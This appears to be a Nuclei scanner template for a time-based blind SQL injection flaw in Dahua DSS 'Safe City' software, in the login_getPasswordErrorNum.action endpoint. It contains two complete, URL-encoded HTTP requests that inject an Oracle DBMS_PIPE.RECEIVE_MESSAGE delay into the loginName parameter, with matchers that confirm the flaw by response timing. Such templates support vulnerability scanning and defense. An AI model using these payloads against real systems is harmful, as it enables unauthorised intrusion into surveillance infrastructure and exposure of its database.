id: dahuaDSS-login_getPasswordErrorNum_action-sql-time

info:
  name: 大华DSS平安城市 login_getPasswordErrorNum.action SQL注入漏洞
  author: dahuaDSS
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /itc/$%7BappPath%7D/login_getPasswordErrorNum.action?userBean.loginName=admin%27%2F%2A%2A%2FAND%2F%2A%2A%2F9434%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2881%29%7C%7CCHR%2876%29%7C%7CCHR%2872%29%7C%7CCHR%2889%29%2C4%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27FsqC%27%3D%27FsqC&userBean.loginPass=123456&_=1693797717346 HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /itc/$%7BappPath%7D/login_getPasswordErrorNum.action?userBean.loginName=admin%27%2F%2A%2A%2FAND%2F%2A%2A%2F9434%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2881%29%7C%7CCHR%2876%29%7C%7CCHR%2872%29%7C%7CCHR%2889%29%2C8%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27FsqC%27%3D%27FsqC&userBean.loginPass=123456&_=1693797717346 HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and